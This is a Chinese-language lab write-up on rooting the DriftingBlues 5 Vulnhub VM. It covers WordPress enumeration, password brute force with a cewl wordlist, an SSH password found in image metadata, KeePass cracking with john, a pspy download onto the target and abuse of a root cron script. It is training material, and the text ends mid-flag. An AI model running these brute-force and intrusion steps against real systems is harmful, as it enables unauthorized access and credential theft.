Vulnhub之DriftingBlues 5靶机详细测试过程（得到root shell） ...

DriftingBlues 5

靶机信息

名称: DriftingBlues: 5
地址:

1. https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova

复制代码

识别IP地址

1. (kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                       
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:a6:7d:47      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.128  08:00:27:12:bf:76      1      60  PCS Systemtechnik GmbH                     

复制代码

NMAP扫描

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 02:50 EDT
4. Nmap scan report for 192.168.56.128
5. Host is up (0.00019s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
11. |   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
12. |_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
13. 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
14. |_http-generator: WordPress 5.6.2
15. |_http-title: diary – Just another WordPress site
16. |_http-server-header: Apache/2.4.38 (Debian)
17. MAC Address: 08:00:27:12:BF:76 (Oracle VirtualBox virtual NIC)
18. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（SSH),80（HTTP）
Get Foothold

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ curl http://192.168.56.128/robots.txt
3. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4. <html><head>
5. <title>404 Not Found</title>
6. </head><body>
7. <h1>Not Found</h1>
8. <p>The requested URL was not found on this server.</p>
9. <hr>
10. <address>Apache/2.4.38 (Debian) Server at 192.168.56.128 Port 80</address>
11. </body></html>

复制代码

目标主机没有robots.txt文件。

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ nikto -h http://192.168.56.128
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.128
6. + Target Hostname:    192.168.56.128
7. + Target Port:        80
8. + Start Time:         2023-05-19 02:53:37 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.38 (Debian)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + Uncommon header 'link' found, with contents: <http://192.168.56.128/index.php/wp-json/>; rel="https://api.w.org/"
14. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
15. + Uncommon header 'x-redirect-by' found, with contents: WordPress
16. + No CGI Directories found (use '-C all' to force check all possible dirs)
17. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
18. + OSVDB-3233: /icons/README: Apache default file found.
19. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
20. + /wp-links-opml.php: This WordPress script reveals the installed version.
21. + OSVDB-3092: /license.txt: License file found may identify site software.
22. + /: A Wordpress installation was found.
23. + Cookie wordpress_test_cookie created without the httponly flag
24. + OSVDB-3268: /wp-content/uploads/: Directory indexing found.
25. + /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
26. + /wp-login.php: Wordpress login found
27. + 7915 requests: 0 error(s) and 15 item(s) reported on remote host
28. + End Time:           2023-05-19 02:54:42 (GMT-4) (65 seconds)

复制代码

nikto工具运行结果表明目标主机运行wordpress,在尝试扫描wordpress用户名和插件之间，看有无其他的目录：

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ gobuster dir -u http://192.168.56.128 -oN nmap_full_scan -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.bak,.js,.txt
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.128
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              bak,txt,php,html,js
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/05/19 02:56:08 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 279]
19. /.php                 (Status: 403) [Size: 279]
20. /index.php            (Status: 301) [Size: 0] [--> http://192.168.56.128/]
21. /wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.128/wp-content/]
22. /license.txt          (Status: 200) [Size: 19915]
23. /wp-login.php         (Status: 200) [Size: 6675]
24. /wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.128/wp-includes/]
25. /readme.html          (Status: 200) [Size: 7278]
26. /wp-trackback.php     (Status: 200) [Size: 135]
27. /wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.128/wp-admin/]
28. /xmlrpc.php           (Status: 405) [Size: 42]
29. /.html                (Status: 403) [Size: 279]
30. /.php                 (Status: 403) [Size: 279]
31. /wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.128/wp-login.php?action=register]
32. /server-status        (Status: 403) [Size: 279]
33. Progress: 1322241 / 1323366 (99.91%)
34. ===============================================================
35. 2023/05/19 03:00:52 Finished
36. ===============================================================

复制代码

gobuster工具没有扫描出更有用的的目录或者文件。

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ wpscan --url http://192.168.56.128 -e u,p
3. [+] abuzerkomurcu
4. | Found By: Author Posts - Author Pattern (Passive Detection)
5. | Confirmed By:
6. |  Rss Generator (Passive Detection)
7. |  Wp Json Api (Aggressive Detection)
8. |   - http://192.168.56.128/index.php/wp-json/wp/v2/users/?per_page=100&page=1
9. |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
10. |  Login Error Messages (Aggressive Detection)
12. [+] satanic
13. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
14. | Confirmed By: Login Error Messages (Aggressive Detection)
16. [+] gill
17. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
18. | Confirmed By: Login Error Messages (Aggressive Detection)
20. [+] collins
21. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
22. | Confirmed By: Login Error Messages (Aggressive Detection)
24. [+] gadd
25. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
26. | Confirmed By: Login Error Messages (Aggressive Detection)

复制代码

wpscan工具扫描出用户名，（备注：没有扫描出有漏洞的插件）

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ wpscan --url http://192.168.56.128 -U abuzerkomurcu -P /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

复制代码

用经典的rockyou.txt字典没有破解出来，考虑到目标主机页面内容较多，是否密码存在页面中，因此用cewl工具生成字典：

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ cewl -d 3 http://192.168.56.128 -w dict
3. CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

复制代码

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ wpscan --url http://192.168.56.128 -U users.dict -P dict
3. [!] Valid Combinations Found:
4. | Username: gill, Password: interchangeable

复制代码

但是只有gill的密码被破解出来，利用该密码登录，发现gill并不是管理员用户，在媒体中发现了一张图片，这张图片并没有出现在前端页面中，比较可疑，将其下载到Kali Linux本地。

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ exiftool dblogo.png
3. ExifTool Version Number         : 12.44
4. File Name                       : dblogo.png
5. Directory                       : .
6. File Size                       : 19 kB
7. File Modification Date/Time     : 2023:05:19 03:31:44-04:00
8. File Access Date/Time           : 2023:05:19 03:31:44-04:00
9. File Inode Change Date/Time     : 2023:05:19 03:31:44-04:00
10. File Permissions                : -rw-r--r--
11. File Type                       : PNG
12. File Type Extension             : png
13. MIME Type                       : image/png
14. Image Width                     : 300
15. Image Height                    : 300
16. Bit Depth                       : 8
17. Color Type                      : RGB with Alpha
18. Compression                     : Deflate/Inflate
19. Filter                          : Adaptive
20. Interlace                       : Noninterlaced
21. SRGB Rendering                  : Perceptual
22. Gamma                           : 2.2
23. Pixels Per Unit X               : 2835
24. Pixels Per Unit Y               : 2835
25. Pixel Units                     : meters
26. XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
27. Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
28. Create Date                     : 2021:02:24 02:55:28+03:00
29. Metadata Date                   : 2021:02:24 02:55:28+03:00
30. Modify Date                     : 2021:02:24 02:55:28+03:00
31. Instance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
32. Document ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
33. Original Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c
34. Color Mode                      : RGB
35. ICC Profile Name                : sRGB IEC61966-2.1
36. Format                          : image/png
37. History Action                  : created, saved
38. History Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
39. History When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
40. History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
41. History Changed                 : /
42. Text Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not
43. Text Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)
44. Document Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
45. Image Size                      : 300x300
46. Megapixels                      : 0.090

复制代码

利用exiftool工具得到了ssh密码，利用该密码登录其SSH:

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ ssh gill@192.168.56.128
3. The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
4. ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
5. This host key is known by the following other names/addresses:
6.     ~/.ssh/known_hosts:35: [hashed name]
7. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
8. Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
9. gill@192.168.56.128's password:
10. Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
12. The programs included with the Debian GNU/Linux system are free software;
13. the exact distribution terms for each program are described in the
14. individual files in /usr/share/doc/*/copyright.
16. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
17. permitted by applicable law.
18. gill@driftingblues:~$ id
19. uid=1000(gill) gid=1000(gill) groups=1000(gill)
20. gill@driftingblues:~$ ls -alh
21. total 24K
22. drwxr-xr-x 4 gill gill 4.0K May 19 02:33 .
23. drwxr-xr-x 4 root root 4.0K Feb 24  2021 ..
24. drwx------ 3 gill gill 4.0K May 19 02:33 .gnupg
25. -rwx------ 1 gill gill 2.0K Feb 24  2021 keyfile.kdbx
26. drwx------ 2 gill gill 4.0K Feb 24  2021 .ssh
27. -r-x------ 1 gill gill 1.8K Jan  3  2021 user.txt
28. gill@driftingblues:~$ cat user.txt
29. flag 1/2
30. ░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
31. ░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
32. ░░░░█░░░░░░░░░░░░░░░░░░░░░░█
33. ░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
34. ░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
35. █░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
36. █░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
37. ░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
38. ░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
39. ░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
40. ░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
41. ░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
42. ░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
43. ░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
44. ░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
45. ░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
46. ░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
47. ░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
48. ░░█░░▌░█░░█░░█░░░█░░█░░█
49. ░░█░░▀▀░░██░░█░░░█░░█░░█
50. ░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
54. gill@driftingblues:~$

复制代码

Privilege Escalation

在gill家目录中有文件keyfile.kdbx,肯定非常有用，将其下载到Kali Linux。

1. 通过KeePass密码安全创建的数据文件称为KDBX文件，它们通常所说的KeePass的密码数据库。这些文件包含密码的加密数据库，其中如果用户设置一个主密码，并通过主密码访问他们，他们只能查看。当涉及到的电子邮件帐户的个人登录凭据，电子商务网站，视窗，FTP站点和其他目的的安全存储KDBX文件是很有用的。

复制代码

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
2. └─$ wget http://192.168.56.128:8000/keyfile.kdbx            
3. --2023-05-19 03:36:26--  http://192.168.56.128:8000/keyfile.kdbx
4. Connecting to 192.168.56.128:8000... connected.
5. HTTP request sent, awaiting response... 200 OK
6. Length: 2030 (2.0K) [application/octet-stream]
7. Saving to: ‘keyfile.kdbx’
9. keyfile.kdbx                            100%[============================================================================>]   1.98K  --.-KB/s    in 0s      
11. 2023-05-19 03:36:26 (217 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]
14. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
15. └─$ keepass2john keyfile.kdbx > keyfile_hash
17. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
18. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt keyfile_hash
19. Using default input encoding: UTF-8
20. Loaded 1 password hash (KeePass [SHA256 AES 32/64])
21. Cost 1 (iteration count) is 60000 for all loaded hashes
22. Cost 2 (version) is 2 for all loaded hashes
23. Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
24. Will run 2 OpenMP threads
25. Press 'q' or Ctrl-C to abort, almost any other key for status
26. porsiempre       (keyfile)     
27. 1g 0:00:01:23 DONE (2023-05-19 03:38) 0.01196g/s 82.44p/s 82.44c/s 82.44C/s winston1..palomita
28. Use the "--show" option to display all of the cracked passwords reliably
29. Session completed.

复制代码

用得到的密码到下面的网站破解文件:

1. https://app.keeweb.info/

复制代码

得到5个类似于密码的字符串，但是并不是root密码

1. 2real4surreal
2. buddyretard
3. closet313
4. exalted
5. fracturedocean
6. zakkwylde

复制代码

1. ill@driftingblues:/tmp$ wget http://192.168.56.230:8000/pspy64
2. --2023-05-19 02:45:48--  http://192.168.56.230:8000/pspy64
3. Connecting to 192.168.56.230:8000... connected.
4. HTTP request sent, awaiting response... 200 OK
5. Length: 3104768 (3.0M) [application/octet-stream]
6. Saving to: ‘pspy64’
8. pspy64                                  100%[============================================================================>]   2.96M  --.-KB/s    in 0.03s   
10. 2023-05-19 02:45:48 (102 MB/s) - ‘pspy64’ saved [3104768/3104768]
12. gill@driftingblues:/tmp$ chmod +x pspy64
13. gill@driftingblues:/tmp$ ./pspy64
14. pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
17.      ██▓███    ██████  ██▓███ ▓██   ██▓
18.     ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
19.     ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
20.     ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
21.     ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
22.     ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
23.     ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
24.     ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
25.                    ░           ░ ░     
26.                                ░ ░     
28. Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
29. Draining file system events due to startup...
30. done
31. 2023/05/19 02:46:01 CMD: UID=0     PID=1694   | /bin/bash /root/key.sh
32. 2023/05/19 02:46:01 CMD: UID=0     PID=1693   | /bin/sh -c /root/key.sh
33. 2023/05/19 02:46:01 CMD: UID=0     PID=1692   | /usr/sbin/CRON -f
34. 2023/05/19 02:46:01 CMD: UID=1000  PID=1685   | ./pspy64
35. 2023/05/19 02:46:01 CMD: UID=0     PID=1665   |
36. 2023/05/19 02:46:01 CMD: UID=0     PID=1585   |
37. 2023/05/19 02:46:01 CMD: UID=1000  PID=1545   | -bash
38. 2023/05/19 02:46:01 CMD: UID=1000  PID=1544   | sshd: gill@pts/0     
39. 2023/05/19 02:46:01 CMD: UID=1000  PID=1531   | (sd-pam)
40. 2023/05/19 02:46:01 CMD: UID=1000  PID=1530   | /lib/systemd/systemd --user
41. 2023/05/19 02:46:01 CMD: UID=0     PID=1527   | sshd: gill [priv]   
42. 2023/05/19 02:46:01 CMD: UID=33    PID=1238   | /usr/sbin/apache2 -k start
43. 2023/05/19 02:46:01 CMD: UID=33    PID=1202   | /usr/sbin/apache2 -k start
44. 2023/05/19 02:46:01 CMD: UID=33    PID=1027   | /usr/sbin/apache2 -k start
45. 2023/05/19 02:46:01 CMD: UID=0     PID=949    |
46. 2023/05/19 02:46:01 CMD: UID=33    PID=846    | /usr/sbin/apache2 -k start
47. 2023/05/19 02:46:01 CMD: UID=33    PID=806    | /usr/sbin/apache2 -k start
48. 2023/05/19 02:46:01 CMD: UID=33    PID=805    | /usr/sbin/apache2 -k start
49. 2023/05/19 02:46:01 CMD: UID=33    PID=777    | /usr/sbin/apache2 -k start
50. 2023/05/19 02:46:01 CMD: UID=33    PID=743    | /usr/sbin/apache2 -k start
51. 2023/05/19 02:46:01 CMD: UID=33    PID=541    | /usr/sbin/apache2 -k start
52. 2023/05/19 02:46:01 CMD: UID=33    PID=540    | /usr/sbin/apache2 -k start
53. 2023/05/19 02:46:01 CMD: UID=0     PID=524    | /usr/sbin/apache2 -k start
54. 2023/05/19 02:46:01 CMD: UID=0     PID=492    | /usr/sbin/sshd -D
55. 2023/05/19 02:46:01 CMD: UID=106   PID=488    | /usr/sbin/mysqld
56. 2023/05/19 02:46:01 CMD: UID=0     PID=409    | /sbin/agetty -o -p -- \u --noclear tty1 linux
57. 2023/05/19 02:46:01 CMD: UID=0     PID=384    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                                                                                        
58. 2023/05/19 02:46:01 CMD: UID=104   PID=354    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
59. 2023/05/19 02:46:01 CMD: UID=0     PID=353    | /lib/systemd/systemd-logind
60. 2023/05/19 02:46:01 CMD: UID=0     PID=352    | /usr/sbin/cron -f
61. 2023/05/19 02:46:01 CMD: UID=0     PID=347    | /usr/sbin/rsyslogd -n -iNONE
62. 2023/05/19 02:46:01 CMD: UID=101   PID=341    | /lib/systemd/systemd-timesyncd
63. 2023/05/19 02:46:01 CMD: UID=0     PID=328    |
64. 2023/05/19 02:46:01 CMD: UID=0     PID=327    |
65. 2023/05/19 02:46:01 CMD: UID=0     PID=326    |
66. 2023/05/19 02:46:01 CMD: UID=0     PID=325    |
67. 2023/05/19 02:46:01 CMD: UID=0     PID=321    |
68. 2023/05/19 02:46:01 CMD: UID=0     PID=320    |
69. 2023/05/19 02:46:01 CMD: UID=0     PID=275    |
70. 2023/05/19 02:46:01 CMD: UID=0     PID=274    |
71. 2023/05/19 02:46:01 CMD: UID=0     PID=237    | /lib/systemd/systemd-udevd
72. 2023/05/19 02:46:01 CMD: UID=0     PID=215    | /lib/systemd/systemd-journald
73. 2023/05/19 02:46:01 CMD: UID=0     PID=187    |
74. 2023/05/19 02:46:01 CMD: UID=0     PID=186    |
75. 2023/05/19 02:46:01 CMD: UID=0     PID=184    |
76. 2023/05/19 02:46:01 CMD: UID=0     PID=153    |
77. 2023/05/19 02:46:01 CMD: UID=0     PID=117    |
78. 2023/05/19 02:46:01 CMD: UID=0     PID=116    |
79. 2023/05/19 02:46:01 CMD: UID=0     PID=114    |
80. 2023/05/19 02:46:01 CMD: UID=0     PID=113    |
81. 2023/05/19 02:46:01 CMD: UID=0     PID=111    |
82. 2023/05/19 02:46:01 CMD: UID=0     PID=110    |
83. 2023/05/19 02:46:01 CMD: UID=0     PID=108    |
84. 2023/05/19 02:46:01 CMD: UID=0     PID=106    |
85. 2023/05/19 02:46:01 CMD: UID=0     PID=59     |
86. 2023/05/19 02:46:01 CMD: UID=0     PID=50     |
87. 2023/05/19 02:46:01 CMD: UID=0     PID=49     |
88. 2023/05/19 02:46:01 CMD: UID=0     PID=48     |
89. 2023/05/19 02:46:01 CMD: UID=0     PID=30     |
90. 2023/05/19 02:46:01 CMD: UID=0     PID=29     |
91. 2023/05/19 02:46:01 CMD: UID=0     PID=28     |
92. 2023/05/19 02:46:01 CMD: UID=0     PID=27     |
93. 2023/05/19 02:46:01 CMD: UID=0     PID=26     |
94. 2023/05/19 02:46:01 CMD: UID=0     PID=25     |
95. 2023/05/19 02:46:01 CMD: UID=0     PID=24     |
96. 2023/05/19 02:46:01 CMD: UID=0     PID=23     |
97. 2023/05/19 02:46:01 CMD: UID=0     PID=22     |
98. 2023/05/19 02:46:01 CMD: UID=0     PID=21     |
99. 2023/05/19 02:46:01 CMD: UID=0     PID=20     |
100. 2023/05/19 02:46:01 CMD: UID=0     PID=19     |
101. 2023/05/19 02:46:01 CMD: UID=0     PID=18     |
102. 2023/05/19 02:46:01 CMD: UID=0     PID=17     |
103. 2023/05/19 02:46:01 CMD: UID=0     PID=16     |
104. 2023/05/19 02:46:01 CMD: UID=0     PID=15     |
105. 2023/05/19 02:46:01 CMD: UID=0     PID=14     |
106. 2023/05/19 02:46:01 CMD: UID=0     PID=12     |
107. 2023/05/19 02:46:01 CMD: UID=0     PID=11     |
108. 2023/05/19 02:46:01 CMD: UID=0     PID=10     |
109. 2023/05/19 02:46:01 CMD: UID=0     PID=9      |
110. 2023/05/19 02:46:01 CMD: UID=0     PID=8      |
111. 2023/05/19 02:46:01 CMD: UID=0     PID=6      |
112. 2023/05/19 02:46:01 CMD: UID=0     PID=4      |
113. 2023/05/19 02:46:01 CMD: UID=0     PID=3      |
114. 2023/05/19 02:46:01 CMD: UID=0     PID=2      |
115. 2023/05/19 02:46:01 CMD: UID=0     PID=1      | /sbin/init
116. 2023/05/19 02:46:01 CMD: UID=0     PID=1696   | /bin/bash /root/key.sh

复制代码

将pyps64工具上传目标主机，发现有个进程会被每分钟执行一次：

1. 2023/05/19 02:46:01 CMD: UID=0     PID=1693   | /bin/sh -c /root/key.sh

复制代码

而根目录下有/keyfolder，从/root/key.sh脚本的名字看出应该是跟密码有关，而/keyfolder为密码目录，但是当前该目录下什么都没有，因此将前面破解得到的类似于密码的字符串作为文件名创建文件，但是然后看该目录下有无变化，而且需要删掉创建的文件，说实话，这个漏洞太难发现了，也是参考别人的做法。

1. gill@driftingblues:/keyfolder$ cd /tmp
2. gill@driftingblues:/tmp$ touch 2real4surreal
3. gill@driftingblues:/tmp$ mv 2real4surreal /keyfolder/
4. gill@driftingblues:/tmp$ ls -alh /keyfolder/*
5. -rw-r--r-- 1 gill gill 0 May 19 03:01 /keyfolder/2real4surreal
6. -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/buddyretard
7. -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/closet313
8. -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/exalted
9. -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/fracturedocean
10. -rw-r--r-- 1 gill gill 0 May 19 02:56 /keyfolder/zakkwylde
11. gill@driftingblues:/tmp$ ls -alh /keyfolder/
12. total 8.0K
13. drwx---rwx  2 root root 4.0K May 19 03:01 .
14. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
15. -rw-r--r--  1 gill gill    0 May 19 03:01 2real4surreal
16. -rw-r--r--  1 gill gill    0 May 19 02:55 buddyretard
17. -rw-r--r--  1 gill gill    0 May 19 02:55 closet313
18. -rw-r--r--  1 gill gill    0 May 19 02:55 exalted
19. -rw-r--r--  1 gill gill    0 May 19 02:55 fracturedocean
20. -rw-r--r--  1 gill gill    0 May 19 02:56 zakkwylde
21. gill@driftingblues:/tmp$ rm -rf /keyfolder/*
22. gill@driftingblues:/tmp$ touch buddyretard
23. gill@driftingblues:/tmp$ ls -alh /keyfolder/
24. total 8.0K
25. drwx---rwx  2 root root 4.0K May 19 03:02 .
26. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
27. gill@driftingblues:/tmp$ mv buddyretard /keyfolder/
28. gill@driftingblues:/tmp$ ls -alh /keyfolder/
29. total 8.0K
30. drwx---rwx  2 root root 4.0K May 19 03:03 .
31. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
32. -rw-r--r--  1 gill gill    0 May 19 03:02 buddyretard
33. gill@driftingblues:/tmp$ rm -rf /keyfolder/*
34. gill@driftingblues:/tmp$ touch closet313
35. gill@driftingblues:/tmp$ mv closet313 /keyfolder/
36. gill@driftingblues:/tmp$ ls -alh /keyfolder/
37. total 8.0K
38. drwx---rwx  2 root root 4.0K May 19 03:03 .
39. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
40. -rw-r--r--  1 gill gill    0 May 19 03:03 closet313
41. gill@driftingblues:/tmp$ rm -rf /keyfolder/*
42. gill@driftingblues:/tmp$ touch exalted
43. gill@driftingblues:/tmp$ mv exalted /keyfolder/
44. gill@driftingblues:/tmp$ ls -alh /keyfolder/
45. total 8.0K
46. drwx---rwx  2 root root 4.0K May 19 03:04 .
47. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
48. -rw-r--r--  1 gill gill    0 May 19 03:03 exalted
49. gill@driftingblues:/tmp$ rm -rf /keyfolder/*
50. gill@driftingblues:/tmp$ touch fracturedocean
51. gill@driftingblues:/tmp$ mv fracturedocean /keyfolder/
52. gill@driftingblues:/tmp$ ls -alh /keyfolder/
53. total 8.0K
54. drwx---rwx  2 root root 4.0K May 19 03:04 .
55. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
56. -rw-r--r--  1 gill gill    0 May 19 03:04 fracturedocean
57. gill@driftingblues:/tmp$ ls -alh /keyfolder/
58. total 12K
59. drwx---rwx  2 root root 4.0K May 19 03:05 .
60. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
61. -rw-r--r--  1 gill gill    0 May 19 03:04 fracturedocean
62. -rw-r--r--  1 root root   29 May 19 03:05 rootcreds.txt
63. gill@driftingblues:/tmp$ cat /keyfolder/rootcreds.txt
64. root creds
66. imjustdrifting31
67. gill@driftingblues:/tmp$

复制代码

1. gill@driftingblues:/tmp$ su - root
2. Password:
3. root@driftingblues:~# id
4. uid=0(root) gid=0(root) groups=0(root)
5. root@driftingblues:~# cd /root
6. root@driftingblues:~# ls -alh
7. total 20K
8. drwx------  2 root root 4.0K Mar  8  2021 .
9. drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
10. -rw-------  1 root root   45 Mar  8  2021 .bash_history
11. -rwx------  1 root root  205 Feb 24  2021 key.sh
12. -r-x------  1 root root 1.8K Dec 17  2020 root.txt
13. root@driftingblues:~# cat root.txt
14. flag 2/2
15. ░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
16. ░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
17. ░░░░█░░░░░░░░░░░░░░░░░░░░░░█
18. ░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
19. ░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
20. █░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
21. █░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
